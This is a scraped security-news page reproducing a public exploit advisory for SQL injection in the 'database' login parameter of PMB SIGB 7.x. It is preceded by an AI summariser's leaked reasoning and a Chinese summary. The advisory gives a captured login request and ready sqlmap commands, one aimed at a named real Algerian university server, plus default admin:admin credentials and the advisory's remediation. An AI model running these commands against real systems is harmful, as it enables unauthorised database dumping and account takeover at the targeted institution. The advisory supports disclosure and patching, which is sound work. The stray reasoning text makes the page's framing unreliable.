嗯,用户让我用中文总结一篇文章,控制在100字以内,而且不需要特定的开头。我得先仔细阅读文章内容。 文章标题是关于PMB SIGB 7.x的SQL注入漏洞。作者是DZ Mind Injector,日期是2025年12月26日,地点在阿尔及利亚。漏洞出现在main.php的登录端点,数据库参数没有被正确过滤,导致SQL注入。 用户提供的请求示例显示,通过POST请求发送了database、user和password参数。响应显示302重定向,但没有错误提示。利用sqlmap工具可以进行攻击,比如枚举数据库、提取表和列,甚至窃取数据。 影响方面包括数据库枚举、数据外泄以及潜在的认证绕过。修复建议是升级到8.0.1.2或更高版本。 现在要总结这些内容,控制在100字以内。需要涵盖漏洞的位置、原因、影响和修复方法。 可能的结构:PMB SIGB 7.x的main.php登录端点存在SQL注入漏洞,因数据库参数未过滤。攻击者可枚举数据库、提取数据并绕过认证。建议升级到8.0.1.2以上版本修复。 检查字数是否合适,确保不超过限制。 </think> PMB SIGB 7.x 存在 SQL 注入漏洞,攻击者可通过 `database` 参数在登录端点执行恶意查询。此漏洞可能导致数据库枚举、数据外泄及认证绕过。建议升级至 PMB 8.0.1.2 或更高版本修复问题。 2025-12-27 21:41:56 Author: cxsecurity.com(查看原文) 阅读量:3 收藏
PMB SIGB 7.x - SQL Injection
Exploit Title: PMB SIGB 7.x - SQL Injection Date: 12-26-2025 Location : Algeria 23000 Exploit Author: DZ Mind Injector Vendor Homepage: https://www.sigb.net Software Link: https://forge.sigb.net/projects/pmb Version: <= 7.5.8 Tested on: PMB 7.x CVE: N/A Category: webapps Vulnerability Summary PMB SIGB main.php login endpoint is vulnerable to SQL Injection in the database parameter. The application fails to sanitize user-supplied input before including it in a database query during authentication. Vulnerable Request (Captured via Burp Suite) text POST /main.php HTTP/2 Host: target.com Content-Length: 51 Cache-Control: max-age=0 Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Accept-Language: en-US,en;q=0.9 Origin: target.com Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: target.com Accept-Encoding: gzip, deflate, br Priority: u=0, i ret_url=&database=ehec_db&user=admin&password=admin Response (302 Success - No login_error=1): text HTTP/2 302 Found Location: index.php Exploit Command text sqlmap -u "https://target.com/main.php" --data="ret_url=&database=ehec_db&user=admin&password=admin" -p database --batch --dbs --risk=3 --level=5 POC (Real Algerian University Target) text sqlmap -u "https://pmb.univ-guelma.dz/main.php" --data="ret_url=&database=ehec_db&user=admin&password=admin" -p database --batch --dbs --risk=3 --level=5 Technical Details The database parameter is directly concatenated into the SQL query without sanitization: sql SELECT * FROM users WHERE database='$database' AND user='$user' AND password='$password' Impact Database enumeration (--dbs) Table/column extraction Data exfiltration (users, passwords, library records) Potential authentication bypass Combined with default admin:admin = full admin access Remediation Upgrade to PMB >= 8.0.1.2
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
Copyright 2025, cxsecurity.com
如有侵权请联系:admin#unsafe.sh